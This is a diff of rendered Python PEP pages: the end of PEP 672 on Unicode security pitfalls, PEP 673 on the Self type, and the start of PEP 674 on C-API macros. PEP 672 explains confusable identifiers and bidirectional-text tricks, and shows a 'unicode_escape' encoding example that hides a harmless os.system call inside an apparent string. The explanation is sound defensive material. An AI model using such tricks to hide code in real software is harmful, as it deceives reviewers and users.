    +
  • BS (\b, Backspace) moves the cursor back, so the character after it +will overwrite the character before.
  • +
  • CR (\r, carriage return) moves the cursor to the start of line, +subsequent characters overwrite the start of the line.
  • +
  • SUB (\x1A, Ctrl+Z) means “End of text” on Windows. Some programs +(such as type) ignore the rest of the file after it.
  • +
  • ESC (\x1B) commonly initiates escape codes which allow arbitrary +control of the terminal.
  • +
+
+
+
+

Confusable Characters in Identifiers

+

Python is not limited to ASCII. +It allows characters of all scripts – Latin letters to ancient Egyptian +hieroglyphs – in identifiers (such as variable names). +See PEP 3131 for details and rationale. +Only “letters and numbers” are allowed, so while γάτα is a valid Python +identifier, 🐱 is not. (See Identifiers and keywords for details.)

+

Non-printing control characters are also not allowed in identifiers.

+

However, within the allowed set there is a large number of “confusables”. +For example, the uppercase versions of the Latin b, Greek β (Beta), and +Cyrillic в (Ve) often look identical: B, Β and В, respectively.

+

This allows identifiers that look the same to humans, but not to Python. +For example, all of the following are distinct identifiers:

+
    +
  • scope (Latin, ASCII-only)
  • +
  • scоpe (with a Cyrillic о)
  • +
  • scοpe (with a Greek ο)
  • +
  • ѕсоре (all Cyrillic letters)
  • +
+

Additionally, some letters can look like non-letters:

+
    +
  • The letter for the Hawaiian ʻokina looks like an apostrophe; +ʻHelloʻ is a Python identifier, not a string.
  • +
  • The East Asian word for ten looks like a plus sign, +so 十= 10 is a complete Python statement. (The “十” is a word: “ten” +rather than “10”.)
  • +
+
+

Note

+

The converse also applies – some symbols look like letters – but since +Python does not allow arbitrary symbols in identifiers, this is not an +issue.

+
+
+
+

Confusable Digits

+

Numeric literals in Python only use the ASCII digits 0-9 (and non-digits such +as . or e).

+

However, when numbers are converted from strings, such as in the int and +float constructors or by the str.format method, any decimal digit +can be used. For example, ߅ (NKO DIGIT FIVE) or ௫ +(TAMIL DIGIT FIVE) work as the digit 5.

+

Some scripts include digits that look similar to ASCII ones, but have a +different value. For example:

+
>>> int('৪୨')
+42
+>>> '{٥}'.format('zero', 'one', 'two', 'three', 'four', 'five')
+five
+
+
+
+
+

Bidirectional Text

+

Some scripts, such as Hebrew or Arabic, are written right-to-left. +Phrases in such scripts interact with nearby text in ways that can be +surprising to people who aren’t familiar with these writing systems and their +computer representation.

+

The exact process is complicated, and explained in Unicode Standard Annex #9, +Unicode Bidirectional Algorithm.

+

Consider the following code, which assigns a 100-character string to +the variable s:

+
s = "X" * 100 #    "X" is assigned
+
+
+

When the X is replaced by the Hebrew letter א, the line becomes:

+
s = "א" * 100 #    "א" is assigned
+
+
+

This command still assigns a 100-character string to s, but +when displayed as general text following the Bidirectional Algorithm +(e.g. in a browser), it appears as s = "א" followed by a comment.

+

Other surprising examples include:

+
    +
  • In the statement ערך = 23, the variable ערך is set to the integer 23.
  • +
  • In the statement قيمة = ערך, the variable قيمة is set +to the value of ערך.
  • +
  • In the statement قيمة - (ערך ** 2), the value of ערך is squared and +then subtracted from قيمة. +The opening parenthesis is displayed as ).
  • +
+
+
+

Bidirectional Marks, Embeddings, Overrides and Isolates

+

Default reordering rules do not always yield the intended direction of text, so +Unicode provides several ways to alter it.

+

The most basic are directional marks, which are invisible but affect text +as a left-to-right (or right-to-left) character would. +Continuing with the s = "X" example above, in the next example the X is +replaced by the Latin x followed or preceded by a +right-to-left mark (U+200F). This assigns a 200-character string to s +(100 copies of x interspersed with 100 invisible marks), +but under Unicode rules for general text, it is rendered as s = "x" +followed by an ASCII-only comment:

+
s = "x‏" * 100 #    "‏x" is assigned
+
+
+

The directional embedding, override and isolate characters +are also invisible, but affect the ordering of all text after them until either +ended by a dedicated character, or until the end of line. +(Unicode specifies the effect to last until the end of a “paragraph” (see +Unicode Bidirectional Algorithm), +but allows tools to interpret newline characters as paragraph ends +(see Unicode Newline Guidelines). Most code editors and terminals do so.)

+

These characters essentially allow arbitrary reordering of the text that +follows them. Python only allows them in strings and comments, which does limit +their potential (especially in combination with the fact that Python’s comments +always extend to the end of a line), but it doesn’t render them harmless.

+
+
+

Normalizing identifiers

+

Python strings are collections of Unicode codepoints, not “characters”.

+

For reasons like compatibility with earlier encodings, Unicode often has +several ways to encode what is essentially a single “character”. +For example, all these are different ways of writing Å as a Python string, +each of which is unequal to the others.

+
    +
  • "\N{LATIN CAPITAL LETTER A WITH RING ABOVE}" (1 codepoint)
  • +
  • "\N{LATIN CAPITAL LETTER A}\N{COMBINING RING ABOVE}" (2 codepoints)
  • +
  • "\N{ANGSTROM SIGN}" (1 codepoint, but different)
  • +
+

For another example, the ligature ﬁ has a dedicated Unicode codepoint, +even though it has the same meaning as the two letters fi.

+

Also, common letters frequently have several distinct variations. +Unicode provides them for contexts where the difference has some semantic +meaning, like mathematics. For example, some variations of n are:

+
    +
  • n (LATIN SMALL LETTER N)
  • +
  • 𝐧 (MATHEMATICAL BOLD SMALL N)
  • +
  • 𝘯 (MATHEMATICAL SANS-SERIF ITALIC SMALL N)
  • +
  • ｎ (FULLWIDTH LATIN SMALL LETTER N)
  • +
  • ⁿ (SUPERSCRIPT LATIN SMALL LETTER N)
  • +
+

Unicode includes algorithms to normalize variants like these to a single +form, and Python identifiers are normalized. +(There are several normal forms; Python uses NFKC.)

+

For example, xn and xⁿ are the same identifier in Python:

+
>>> xⁿ = 8
+>>> xn
+8
+
+
+

… as are ﬁ and fi, and the different ways to encode Å.

+

This normalization applies only to identifiers, however. +Functions that treat strings as identifiers, such as getattr, +do not perform normalization:

+
>>> class Test:
+...     def ﬁnalize(self):
+...         print('OK')
+...
+>>> Test().ﬁnalize()
+OK
+>>> Test().finalize()
+OK
+>>> getattr(Test(), 'ﬁnalize')
+Traceback (most recent call last):
+  ...
+AttributeError: 'Test' object has no attribute 'ﬁnalize'
+
+
+

This also applies when importing:

+
    +
  • import ﬁnalization performs normalization, and looks for a file +named finalization.py (and other finalization.* files).
  • +
  • importlib.import_module("ﬁnalization") does not normalize, +so it looks for a file named ﬁnalization.py.
  • +
+

Some filesystems independently apply normalization and/or case folding. +On some systems, ﬁnalization.py, finalization.py and +FINALIZATION.py are three distinct filenames; on others, some or all +of these name the same file.

+
+
+

Source Encoding

+

The encoding of Python source files is given by a specific regex on the first +two lines of a file, as per Encoding declarations. +This mechanism is very liberal in what it accepts, and thus easy to obfuscate.

+

This can be misused in combination with Python-specific special-purpose +encodings (see Text Encodings). +For example, with encoding: unicode_escape, characters like +quotes or braces can be hidden in an (f-)string, with many tools (syntax +highlighters, linters, etc.) considering them part of the string. +For example:

+
# For writing Japanese, you don't need an editor that supports
+# UTF-8 source encoding: unicode_escape sequences work just as well.
+
+import os
+
+message = '''
+This is "Hello World" in Japanese:
+\u3053\u3093\u306b\u3061\u306f\u7f8e\u3057\u3044\u4e16\u754c
+
+This runs `echo WHOA` in your shell:
+\u0027\u0027\u0027\u002c\u0028\u006f\u0073\u002e
+\u0073\u0079\u0073\u0074\u0065\u006d\u0028
+\u0027\u0065\u0063\u0068\u006f\u0020\u0057\u0048\u004f\u0041\u0027
+\u0029\u0029\u002c\u0027\u0027\u0027
+'''
+
+
+

Here, encoding: unicode_escape in the initial comment is an encoding +declaration. The unicode_escape encoding instructs Python to treat +\u0027 as a single quote (which can start/end a string), \u002c as +a comma (punctuator), etc.

+
+
+
+

Open Issues

+

We should probably write and publish:

+
    +
  • Recommendations for Text Editors and Code Tools
  • +
  • Recommendations for Programmers and Teams
  • +
  • Possible Improvements in Python
  • +
+
+
+

References

+
+
+
[tr36]
+
Unicode Technical Report #36: Unicode Security Considerations +http://www.unicode.org/reports/tr36/
+
+
[tr39]
+
Unicode® Technical Standard #39: Unicode Security Mechanisms +http://www.unicode.org/reports/tr39/
+
+
[tr55]
+
Unicode Technical Report #55: Unicode Source Code Handling +http://www.unicode.org/reports/tr55/
+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0672.rst

+

Last modified: 2024-11-26 10:14:21 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0673/index.html b/pep-0673/index.html new file mode 100644 index 00000000000..a2f3df97a97 --- /dev/null +++ b/pep-0673/index.html @@ -0,0 +1,855 @@ + + + + + + + + PEP 673 – Self Type | peps.python.org + + +
+
+


+ + +
+
+
+

PEP 673 – Self Type

+
+
Author:
+
Pradeep Kumar Srinivasan <gohanpra at gmail.com>, +James Hilton-Balfe <gobot1234yt at gmail.com>
+
Sponsor:
+
Jelle Zijlstra <jelle.zijlstra at gmail.com>
+
Discussions-To:
+
Typing-SIG list
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Created:
+
10-Nov-2021
+
Python-Version:
+
3.11
+
Post-History:
+
17-Nov-2021
+
Resolution:
+
Python-Dev thread
+
+
+
+
Table of Contents +
+
+

Attention

+

This PEP is a historical document: see Self and +typing.Self for up-to-date specs and documentation. Canonical typing specs are maintained at the typing specs site; runtime typing behaviour is described in the CPython documentation.

+


+

See the typing specification update process for how to propose changes to the typing spec.

+
+
+

Abstract

+

This PEP introduces a simple and intuitive way to annotate methods that return +an instance of their class. This behaves the same as the TypeVar-based +approach specified in PEP 484 +but is more concise and easier to follow.

+
+
+

Motivation

+

A common use case is to write a method that returns an instance of the same +class, usually by returning self.

+
class Shape:
+    def set_scale(self, scale: float):
+        self.scale = scale
+        return self
+
+Shape().set_scale(0.5)  # => should be Shape
+
+
+

One way to denote the return type is to specify it as the current class, say, +Shape. Using the method makes the type checker infer the type Shape, +as expected.

+
class Shape:
+    def set_scale(self, scale: float) -> Shape:
+        self.scale = scale
+        return self
+
+Shape().set_scale(0.5)  # => Shape
+
+
+

However, when we call set_scale on a subclass of Shape, the type +checker still infers the return type to be Shape. This is problematic in +situations such as the one shown below, where the type checker will return an +error because we are trying to use attributes or methods not present on the +base class.

+
class Circle(Shape):
+    def set_radius(self, r: float) -> Circle:
+        self.radius = r
+        return self
+
+Circle().set_scale(0.5)  # *Shape*, not Circle
+Circle().set_scale(0.5).set_radius(2.7)
+# => Error: Shape has no attribute set_radius
+
+
+

The present workaround for such instances is to define a TypeVar with the +base class as the bound and use it as the annotation for the self +parameter and the return type:

+
from typing import TypeVar
+
+TShape = TypeVar("TShape", bound="Shape")
+
+class Shape:
+    def set_scale(self: TShape, scale: float) -> TShape:
+        self.scale = scale
+        return self
+
+
+class Circle(Shape):
+    def set_radius(self, radius: float) -> Circle:
+        self.radius = radius
+        return self
+
+Circle().set_scale(0.5).set_radius(2.7)  # => Circle
+
+
+

Unfortunately, this is verbose and unintuitive. Because self is usually +not explicitly annotated, the above solution doesn’t immediately come to mind, +and even if it does, it is very easy to go wrong by forgetting either the +bound on the TypeVar(bound="Shape") or the annotation for self.

+
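As a hedged sketch of the first failure mode: omitting the bound leaves the TypeVar unconstrained, so the attribute assignment no longer type-checks (exact error wording varies by checker):
+
from typing import TypeVar
+
+TShape = TypeVar("TShape")  # oops: forgot bound="Shape"
+
+class Shape:
+    def set_scale(self: TShape, scale: float) -> TShape:
+        self.scale = scale  # Error: "TShape" has no attribute "scale"
+        return self
+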

This difficulty means that users often give up and either use fallback types +like Any or just omit the type annotation completely, both of which make +the code less safe.

+

We propose a more intuitive and succinct way of expressing the above +intention. We introduce a special form Self that stands for a type +variable bound to the encapsulating class. For situations such as the one +above, the user simply has to annotate the return type as Self:

+
from typing import Self
+
+class Shape:
+    def set_scale(self, scale: float) -> Self:
+        self.scale = scale
+        return self
+
+
+class Circle(Shape):
+    def set_radius(self, radius: float) -> Self:
+        self.radius = radius
+        return self
+
+
+

By annotating the return type as Self, we no longer have to declare a +TypeVar with an explicit bound on the base class. The return type Self +mirrors the fact that the function returns self and is easier to +understand.

+

As in the above example, the type checker will correctly infer the type of +Circle().set_scale(0.5) to be Circle, as expected.

+
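For instance, a type checker supporting this PEP would report the following for the classes above (a hedged sketch; reveal_type output format varies by checker):
+
reveal_type(Shape().set_scale(0.5))   # => Shape
+reveal_type(Circle().set_scale(0.5))  # => Circle
+Circle().set_scale(0.5).set_radius(2.7)  # OK: set_scale returns Circle
+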
+

Usage statistics

+

We analyzed popular +open-source projects and found that patterns like the above were used about +40% as often as popular types like dict or Callable. For example, +in typeshed alone, such “Self” types are used 523 times, compared to 1286 uses +of dict and 1314 uses of Callable as of October 2021. +This suggests that a Self type will be used quite often and users will +benefit a lot from the simpler approach above.

+

Users of Python types have also frequently requested this feature, +both on the proposal doc +and on GitHub.

+
+
+
+

Specification

+
+

Use in Method Signatures

+

Self used in the signature of a method is treated as if it were a +TypeVar bound to the class.

+
from typing import Self
+
+class Shape:
+    def set_scale(self, scale: float) -> Self:
+        self.scale = scale
+        return self
+
+
+

is treated equivalently to:

+
from typing import TypeVar
+
+SelfShape = TypeVar("SelfShape", bound="Shape")
+
+class Shape:
+    def set_scale(self: SelfShape, scale: float) -> SelfShape:
+        self.scale = scale
+        return self
+
+
+

This works the same for a subclass too:

+
class Circle(Shape):
+    def set_radius(self, radius: float) -> Self:
+        self.radius = radius
+        return self
+
+
+

which is treated equivalently to:

+
SelfCircle = TypeVar("SelfCircle", bound="Circle")
+
+class Circle(Shape):
+    def set_radius(self: SelfCircle, radius: float) -> SelfCircle:
+        self.radius = radius
+        return self
+
+
+

One implementation strategy is to simply desugar the former to the latter in a +preprocessing step. If a method uses Self in its signature, the type of +self within a method will be Self. In other cases, the type of +self will remain the enclosing class.

+
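A short hedged sketch of this rule, reusing the Shape class above (the revealed types are illustrative):
+
from typing import Self, reveal_type
+
+class Shape:
+    def set_scale(self, scale: float) -> Self:
+        reveal_type(self)  # => Self (a TypeVar bound to Shape)
+        self.scale = scale
+        return self
+
+    def describe(self) -> str:
+        reveal_type(self)  # => Shape (no Self in this signature)
+        return "a shape"
+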
+
+

Use in Classmethod Signatures

+

The Self type annotation is also useful for classmethods that return +an instance of the class that they operate on. For example, from_config in +the following snippet builds a Shape object from a given config.

+
class Shape:
+    def __init__(self, scale: float) -> None: ...
+
+    @classmethod
+    def from_config(cls, config: dict[str, float]) -> Shape:
+        return cls(config["scale"])
+
+
+

However, this means that Circle.from_config(...) is inferred to return a +value of type Shape, when in fact it should be Circle:

+
class Circle(Shape):
+    def circumference(self) -> float: ...
+
+shape = Shape.from_config({"scale": 7.0})
+# => Shape
+
+circle = Circle.from_config({"scale": 7.0})
+# => *Shape*, not Circle
+
+circle.circumference()
+# Error: `Shape` has no attribute `circumference`
+
+
+

The current workaround for this is unintuitive and error-prone:

+
Self = TypeVar("Self", bound="Shape")
+
+class Shape:
+    @classmethod
+    def from_config(
+        cls: type[Self], config: dict[str, float]
+    ) -> Self:
+        return cls(config["scale"])
+
+
+

We propose using Self directly:

+
from typing import Self
+
+class Shape:
+    @classmethod
+    def from_config(cls, config: dict[str, float]) -> Self:
+        return cls(config["scale"])
+
+
+

This avoids the complicated cls: type[Self] annotation and the TypeVar +declaration with a bound. Once again, the latter code behaves equivalently +to the former code.

+
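With that definition, subclasses get the precise return type for free, as in this hedged sketch reusing the Circle class from the earlier snippet:
+
circle = Circle.from_config({"scale": 7.0})
+reveal_type(circle)     # => Circle, not Shape
+circle.circumference()  # OK
+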
+
+

Use in Parameter Types

+

Another use for Self is to annotate parameters that expect instances of +the current class:

+
Self = TypeVar("Self", bound="Shape")
+
+class Shape:
+    def difference(self: Self, other: Self) -> float: ...
+
+    def apply(self: Self, f: Callable[[Self], None]) -> None: ...
+
+
+

We propose using Self directly to achieve the same behavior:

+
from typing import Self
+
+class Shape:
+    def difference(self, other: Self) -> float: ...
+
+    def apply(self, f: Callable[[Self], None]) -> None: ...
+
+
+

Note that specifying self: Self is harmless, so some users may find it +more readable to write the above as:

+
class Shape:
+    def difference(self: Self, other: Self) -> float: ...
+
+
+
+
+

Use in Attribute Annotations

+

Another use for Self is to annotate attributes. One example is where we +have a LinkedList whose elements must be subclasses of the current class.

+
from dataclasses import dataclass
+from typing import Generic, TypeVar
+
+T = TypeVar("T")
+
+@dataclass
+class LinkedList(Generic[T]):
+    value: T
+    next: LinkedList[T] | None = None
+
+# OK
+LinkedList[int](value=1, next=LinkedList[int](value=2))
+# Not OK
+LinkedList[int](value=1, next=LinkedList[str](value="hello"))
+
+
+

However, annotating the next attribute as LinkedList[T] allows invalid +constructions with subclasses:

+
@dataclass
+class OrdinalLinkedList(LinkedList[int]):
+    def ordinal_value(self) -> str:
+        return as_ordinal(self.value)
+
+# Should not be OK because LinkedList[int] is not a subclass of
+# OrdinalLinkedList, but the type checker allows it.
+xs = OrdinalLinkedList(value=1, next=LinkedList[int](value=2))
+
+if xs.next:
+    print(xs.next.ordinal_value())  # Runtime Error.
+
+
+

We propose expressing this constraint using next: Self | None:

+
from typing import Self
+
+@dataclass
+class LinkedList(Generic[T]):
+    value: T
+    next: Self | None = None
+
+@dataclass
+class OrdinalLinkedList(LinkedList[int]):
+    def ordinal_value(self) -> str:
+        return as_ordinal(self.value)
+
+xs = OrdinalLinkedList(value=1, next=LinkedList[int](value=2))
+# Type error: Expected OrdinalLinkedList, got LinkedList[int].
+
+if xs.next is not None:
+    xs.next = OrdinalLinkedList(value=3, next=None)  # OK
+    xs.next = LinkedList[int](value=3, next=None)  # Not OK
+
+
+

The code above is semantically equivalent to treating each attribute +containing a Self type as a property that returns that type:

+
from dataclasses import dataclass
+from typing import Any, Generic, TypeVar
+
+T = TypeVar("T")
+Self = TypeVar("Self", bound="LinkedList")
+
+
+class LinkedList(Generic[T]):
+    value: T
+
+    @property
+    def next(self: Self) -> Self | None:
+        return self._next
+
+    @next.setter
+    def next(self: Self, next: Self | None) -> None:
+        self._next = next
+
+class OrdinalLinkedList(LinkedList[int]):
+    def ordinal_value(self) -> str:
+        return str(self.value)
+
+
+
+
+

Use in Generic Classes

+

Self can also be used in generic class methods:

+
class Container(Generic[T]):
+    value: T
+    def set_value(self, value: T) -> Self: ...
+
+
+

This is equivalent to writing:

+
Self = TypeVar("Self", bound="Container[Any]")
+
+class Container(Generic[T]):
+    value: T
+    def set_value(self: Self, value: T) -> Self: ...
+
+
+

The behavior is to preserve the type argument of the object on which the +method was called. When called on an object with concrete type +Container[int], Self is bound to Container[int]. When called with +an object of generic type Container[T], Self is bound to +Container[T]:

+
def object_with_concrete_type() -> None:
+    int_container: Container[int]
+    str_container: Container[str]
+    reveal_type(int_container.set_value(42))  # => Container[int]
+    reveal_type(str_container.set_value("hello"))  # => Container[str]
+
+def object_with_generic_type(
+    container: Container[T], value: T,
+) -> Container[T]:
+    return container.set_value(value)  # => Container[T]
+
+
+

The PEP doesn’t specify the exact type of self.value within the method set_value. Some type checkers may choose to implement Self types using class-local type variables with Self = TypeVar("Self", bound=Container[T]), which will infer a precise type T. However, given that class-local type variables are not a standardized type system feature, it is also acceptable to infer Any for self.value. We leave this up to the type checker.

+
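The following hypothetical sketch (not part of the PEP) contrasts the two acceptable inference strategies, reusing the Container class and imports from the snippets above:
+
class Container(Generic[T]):
+    value: T
+
+    def set_value(self, value: T) -> Self:
+        reveal_type(self.value)
+        # => T    with class-local Self = TypeVar("Self", bound=Container[T])
+        # => Any  with checkers that fall back to Any
+        self.value = value
+        return self
+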

Note that we reject using Self with type arguments, such as Self[int]. +This is because it creates ambiguity about the type of the self parameter +and introduces unnecessary complexity:

+
class Container(Generic[T]):
+    def foo(
+        self, other: Self[int], other2: Self,
+    ) -> Self[str]:  # Rejected
+        ...
+
+
+

In such cases, we recommend using an explicit type for self:

+
class Container(Generic[T]):
+    def foo(
+        self: Container[T],
+        other: Container[int],
+        other2: Container[T]
+    ) -> Container[str]: ...
+
+
+
+
+

Use in Protocols

+

Self is valid within Protocols, similar to its use in classes:

+
from typing import Protocol, Self
+
+class ShapeProtocol(Protocol):
+    scale: float
+
+    def set_scale(self, scale: float) -> Self:
+        self.scale = scale
+        return self
+
+
+

is treated equivalently to:

+
from typing import TypeVar
+
+SelfShape = TypeVar("SelfShape", bound="ShapeProtocol")
+
+class ShapeProtocol(Protocol):
+    scale: float
+
+    def set_scale(self: SelfShape, scale: float) -> SelfShape:
+        self.scale = scale
+        return self
+
+
+

See PEP 544 for +details on the behavior of TypeVars bound to protocols.

+

Checking a class for compatibility with a protocol: If a protocol uses +Self in methods or attribute annotations, then a class Foo is +considered compatible with the protocol if its corresponding methods and +attribute annotations use either Self or Foo or any of Foo’s +subclasses. See the examples below:

+
from typing import Protocol
+
+class ShapeProtocol(Protocol):
+    def set_scale(self, scale: float) -> Self: ...
+
+class ReturnSelf:
+    scale: float = 1.0
+
+    def set_scale(self, scale: float) -> Self:
+        self.scale = scale
+        return self
+
+class ReturnConcreteShape:
+    scale: float = 1.0
+
+    def set_scale(self, scale: float) -> ReturnConcreteShape:
+        self.scale = scale
+        return self
+
+class BadReturnType:
+    scale: float = 1.0
+
+    def set_scale(self, scale: float) -> int:
+        self.scale = scale
+        return 42
+
+class ReturnDifferentClass:
+    scale: float = 1.0
+
+    def set_scale(self, scale: float) -> ReturnConcreteShape:
+        return ReturnConcreteShape(...)
+
+def accepts_shape(shape: ShapeProtocol) -> None:
+    y = shape.set_scale(0.5)
+    reveal_type(y)
+
+def main() -> None:
+    return_self_shape: ReturnSelf
+    return_concrete_shape: ReturnConcreteShape
+    bad_return_type: BadReturnType
+    return_different_class: ReturnDifferentClass
+
+    accepts_shape(return_self_shape)  # OK
+    accepts_shape(return_concrete_shape)  # OK
+    accepts_shape(bad_return_type)  # Not OK
+    # Not OK because it returns a non-subclass.
+    accepts_shape(return_different_class)
+
+
+
+
+
+

Valid Locations for Self

+

A Self annotation is only valid in class contexts, and will always refer +to the encapsulating class. In contexts involving nested classes, Self +will always refer to the innermost class.

+

The following uses of Self are accepted:

+
class ReturnsSelf:
+    def foo(self) -> Self: ... # Accepted
+
+    @classmethod
+    def bar(cls) -> Self:  # Accepted
+        return cls()
+
+    def __new__(cls, value: int) -> Self: ...  # Accepted
+
+    def explicitly_use_self(self: Self) -> Self: ...  # Accepted
+
+    # Accepted (Self can be nested within other types)
+    def returns_list(self) -> list[Self]: ...
+
+    # Accepted (Self can be nested within other types)
+    @classmethod
+    def return_cls(cls) -> type[Self]:
+        return cls
+
+class Child(ReturnsSelf):
+    # Accepted (we can override a method that uses Self annotations)
+    def foo(self) -> Self: ...
+
+class TakesSelf:
+    def foo(self, other: Self) -> bool: ...  # Accepted
+
+class Recursive:
+    # Accepted (treated as an @property returning ``Self | None``)
+    next: Self | None
+
+class CallableAttribute:
+    def foo(self) -> int: ...
+
+    # Accepted (treated as an @property returning the Callable type)
+    bar: Callable[[Self], int] = foo
+
+class HasNestedFunction:
+    x: int = 42
+
+    def foo(self) -> None:
+
+        # Accepted (Self is bound to HasNestedFunction).
+        def nested(z: int, inner_self: Self) -> Self:
+            print(z)
+            print(inner_self.x)
+            return inner_self
+
+        nested(42, self)  # OK
+
+
+class Outer:
+    class Inner:
+        def foo(self) -> Self: ...  # Accepted (Self is bound to Inner)
+
+
+

The following uses of Self are rejected:

+
def foo(bar: Self) -> Self: ...  # Rejected (not within a class)
+
+bar: Self  # Rejected (not within a class)
+
+class Foo:
+    # Rejected (Self is treated as unknown).
+    def has_existing_self_annotation(self: T) -> Self: ...
+
+class Foo:
+    def return_concrete_type(self) -> Self:
+        return Foo()  # Rejected (see FooChild below for rationale)
+
+class FooChild(Foo):
+    child_value: int = 42
+
+    def child_method(self) -> None:
+        # At runtime, this would be Foo, not FooChild.
+        y = self.return_concrete_type()
+
+        y.child_value
+        # Runtime error: Foo has no attribute child_value
+
+class Bar(Generic[T]):
+    def bar(self) -> T: ...
+
+class Baz(Bar[Self]): ...  # Rejected
+
+
+

We reject type aliases containing Self. Supporting Self outside class definitions can require a lot of special handling in type checkers. Given that it also goes against the rest of the PEP to use Self outside a class definition, we believe the added convenience of aliases is not worth it:

+
TupleSelf = Tuple[Self, Self]  # Rejected
+
+class Alias:
+    def return_tuple(self) -> TupleSelf:  # Rejected
+        return (self, self)
+
+
+

Note that we reject Self in staticmethods. Self does not add much +value since there is no self or cls to return. The only possible use +cases would be to return a parameter itself or some element from a container +passed in as a parameter. These don’t seem worth the additional complexity.

+
class Base:
+    @staticmethod
+    def make() -> Self:  # Rejected
+        ...
+
+    @staticmethod
+    def return_parameter(foo: Self) -> Self:  # Rejected
+        ...
+
+
+

Likewise, we reject Self in metaclasses. Self in this PEP consistently +refers to the same type (that of self). But in metaclasses, it would have +to refer to different types in different method signatures. For example, in +__mul__, Self in the return type would refer to the implementing class +Foo, not the enclosing class MyMetaclass. But, in __new__, Self +in the return type would refer to the enclosing class MyMetaclass. To +avoid confusion, we reject this edge case.

+
class MyMetaclass(type):
+    def __new__(cls, *args: Any) -> Self:  # Rejected
+        return super().__new__(cls, *args)
+
+    def __mul__(cls, count: int) -> list[Self]:  # Rejected
+        return [cls()] * count
+
+class Foo(metaclass=MyMetaclass): ...
+
+
+
+
+

Runtime behavior

+

Because Self is not subscriptable, we propose an implementation similar to +typing.NoReturn.

+
@_SpecialForm
+def Self(self, params):
+    """Used to spell the type of "self" in classes.
+
+    Example::
+
+      from typing import Self
+
+      class ReturnsSelf:
+          def parse(self, data: bytes) -> Self:
+              ...
+              return self
+
+    """
+    raise TypeError(f"{self} is not subscriptable")
+
+
+
+
+

Rejected Alternatives

+
+

Allow the Type Checker to Infer the Return Type

+

One proposal is to leave the Self type implicit and let the type checker +infer from the body of the method that the return type must be the same as the +type of the self parameter:

+
class Shape:
+    def set_scale(self, scale: float):
+        self.scale = scale
+        return self  # Type checker infers that we are returning self
+
+
+

We reject this because Explicit Is Better Than Implicit. Beyond that, the +above approach will fail for type stubs, which don’t have method bodies to +analyze.

+
+
+
+

Reference Implementations

+

Mypy: Proof of concept implementation in Mypy.

+

Pyright: v1.1.184

+

Runtime implementation of Self: PR.

+
+
+

Resources

+

Similar discussions on a Self type in Python started in Mypy around 2016: +Mypy issue #1212 - SelfType or +another way to spell “type of self”. However, the approach ultimately taken +there was the bounded TypeVar approach shown in our “before” examples. +Other issues that discuss this include Mypy issue #2354 - Self types in generic +classes.

+
+
Pradeep made a concrete proposal at the PyCon Typing Summit 2021:
recorded talk, slides.
+
+

James brought up the proposal independently on typing-sig: +Typing-sig thread.

+

Other languages have similar ways to express the type of the enclosing class:

    +
  • TypeScript has the this type
  • +
  • Rust has the Self type
  • +
+

Thanks to the following people for their feedback on the PEP:

+

Jia Chen, Rebecca Chen, Sergei Lebedev, Kaylynn Morgan, Tuomas +Suutari, Eric Traut, Alex Waygood, Shannon Zhu, and Никита Соболев

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0673.rst

+

Last modified: 2024-06-11 22:12:09 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0674/index.html b/pep-0674/index.html new file mode 100644 index 00000000000..eb54ad2e7a2 --- /dev/null +++ b/pep-0674/index.html @@ -0,0 +1,677 @@ + + + + + + + + PEP 674 – Disallow using macros as l-values | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+


+ + +
+
+
+

PEP 674 – Disallow using macros as l-values

+
+
Author:
+
Victor Stinner <vstinner at python.org>
+
Status:
+
Deferred
+
Type:
+
Standards Track
+
Created:
+
30-Nov-2021
+
Python-Version:
+
3.12
+
+
+
+
+
+

Abstract

+

Disallow using macros as l-values. For example, +Py_TYPE(obj) = new_type now fails with a compiler error.

+

In practice, the majority of affected projects only have to make two +changes:

+
    +
  • Replace Py_TYPE(obj) = new_type +with Py_SET_TYPE(obj, new_type).
  • +
  • Replace Py_SIZE(obj) = new_size +with Py_SET_SIZE(obj, new_size).
  • +
+
+
+

PEP Deferral

+

See SC reply to PEP 674 – Disallow using macros as l-values +(February 2022).

+
+
+

Rationale

+
+

Using a macro as an l-value

+

In the Python C API, some functions are implemented as macros because writing a macro is simpler than writing a regular function. If a macro directly exposes a structure member, it is technically possible to use this macro not only to get the structure member but also to set it.

+

Example with the Python 3.10 Py_TYPE() macro:

+
#define Py_TYPE(ob) (((PyObject *)(ob))->ob_type)
+
+
+

This macro can be used as a r-value to get an object type:

+
type = Py_TYPE(object);
+
+
+

It can also be used as an l-value to set an object type:

+
Py_TYPE(object) = new_type;
+
+
+

It is also possible to set an object reference count and an object size using the Py_REFCNT() and Py_SIZE() macros.

+

Directly setting an object attribute relies on the exact current CPython implementation. Implementing this feature in other Python implementations can make their C API implementation less efficient.

+
+
+

CPython nogil fork

+

Sam Gross forked Python 3.9 to remove the GIL: the nogil branch. This fork has no PyObject.ob_refcnt member, but a more elaborate implementation of reference counting, and so the code Py_REFCNT(obj) = new_refcnt; fails with a compiler error.

+

Merging the nogil fork into the upstream CPython main branch first requires fixing this C API compatibility issue. It is a concrete example of a Python optimization indirectly blocked by the C API.

+

This issue was already fixed in Python 3.10: the Py_REFCNT() macro has already been modified to disallow using it as an l-value.

+

These statements are endorsed by Sam Gross (nogil developer).

+
+
+

HPy project

+

The HPy project is a brand new C API for +Python using only handles and function calls: handles are opaque, +structure members cannot be accessed directly, and pointers cannot be +dereferenced.

+

Searching and replacing Py_SET_SIZE() is easier and safer than +searching and replacing some strange macro uses of Py_SIZE(). +Py_SIZE() can be semi-mechanically replaced by HPy_Length(), +whereas seeing Py_SET_SIZE() would immediately make clear that the +code needs bigger changes in order to be ported to HPy (for example by +using HPyTupleBuilder or HPyListBuilder).

+

The fewer internal details exposed via macros, the easier it will be for +HPy to provide direct equivalents. Any macro that references +“non-public” interfaces effectively exposes those interfaces publicly.

+

These statements are endorsed by Antonio Cuni (HPy developer).

+
+
+

GraalVM Python

+

